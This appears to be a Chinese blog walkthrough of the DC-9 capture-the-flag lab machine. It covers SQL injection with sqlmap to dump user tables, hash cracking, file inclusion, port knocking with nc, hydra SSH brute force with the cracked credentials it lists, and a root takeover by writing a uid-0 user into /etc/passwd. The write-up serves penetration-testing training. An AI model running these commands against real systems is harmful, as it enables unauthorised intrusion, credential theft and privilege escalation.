dc9靶机攻略

dc9

扫描

扫描结果如图

nmap

dc9靶机攻略_第1张图片

目录扫描

dc9靶机攻略_第2张图片

指纹扫描

image-20231024213156824

渗透

访问首页

dc9靶机攻略_第3张图片

该处发现搜索框,正常搜名字可以直接返回该用户的信息,怀疑sql注入,使用单引号注入,发现没反应,再使用一下万能注入语句1' or 1=1

dc9靶机攻略_第4张图片

dc9靶机攻略_第5张图片

使用sqlmap

sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' --dbs --batch

爆出数据库staff和users

dc9靶机攻略_第6张图片

爆表

sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D Staff --tables --batch

sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D users --tables --batch

dc9靶机攻略_第7张图片

暴列

sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D Staff -T Users --columns --batch

sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D users -T UserDetails --columns --batch

dc9靶机攻略_第8张图片

爆数据

sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D Staff -T Users -C Username,Password --dump --batch

sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D users -T UserDetails -C username,password --dump --batch

得到一个admin用户信息以及user库中的用户信息

dc9靶机攻略_第9张图片

dc9靶机攻略_第10张图片

admin:856f5de590ef37314e7c3bdf6f8a66dc

拿去hash识别器识别一下

dc9靶机攻略_第11张图片

使用md5解密最终得到

admin:transorbital1

dc9靶机攻略_第12张图片

登录过后发现manage页左下角显示不存在文件

dc9靶机攻略_第13张图片

疑似文件包含

反复回到根目录查看passwd文件,发现可以执行

dc9靶机攻略_第14张图片

发现大部分用户都是/bin/bash的,尝试找到这些能利用的用户登录

将刚刚爆破的users库中的用户放置在txt文件里当字典

随后尝试爆破,发现ssh连不上

此时即为端口敲门

knocked配置文件在/etc/knockd.conf

dc9靶机攻略_第15张图片

得到sequence=7469,8475,9842

向靶机三次敲门

nc 10.4.7.152 7469
nc 10.4.7.152 8475
nc 10.4.7.152 9842

dc9靶机攻略_第16张图片

hydra爆出登录信息

hydra -L pojie1.txt -P pojie2.txt ssh://10.4.7.152 -t 50

dc9靶机攻略_第17张图片

chandlerb:UrAG0D!
joeyt:Passw0rd
janitor:Ilovepeepee

提权

常规探查无效,经过寻找,在janitor的家目录下找到.secrets-for-putin目录

其中有密码文件

dc9靶机攻略_第18张图片

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

加入密码字典后重新爆破

发现多了个用户

fredf:B4-Tru3-001

切换该用户

使用sudo -l发现可以免密root身份执行test

查看test会乱码,直接执行试试

image-20231024225850139

提示需要找到test.py

find名字查找一下

find / -name test.py 2>/dev/null

image-20231024225954397

找到位置

/usr/lib/python3/dist-packages/setuptools/command/test.py

使用命令生成一个盐值为admin的md5密码

openssl passwd -1 -salt admin 123456
生成
$1$admin$LClYcRe.ee8dQwgrFc5nz.

将用户信息添加到/tmp/passwd

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' > /tmp/passwd

image-20231024230856094

然后sudo使用符合脚本形式的执行参数

sudo ./test /tmp/passwd /etc/passwd

随后su 到刚刚创建的用户

su admin
123456

完成提权

dc9靶机攻略_第19张图片

你可能感兴趣的:(靶机系列,1024程序员节,网络安全,web安全,安全)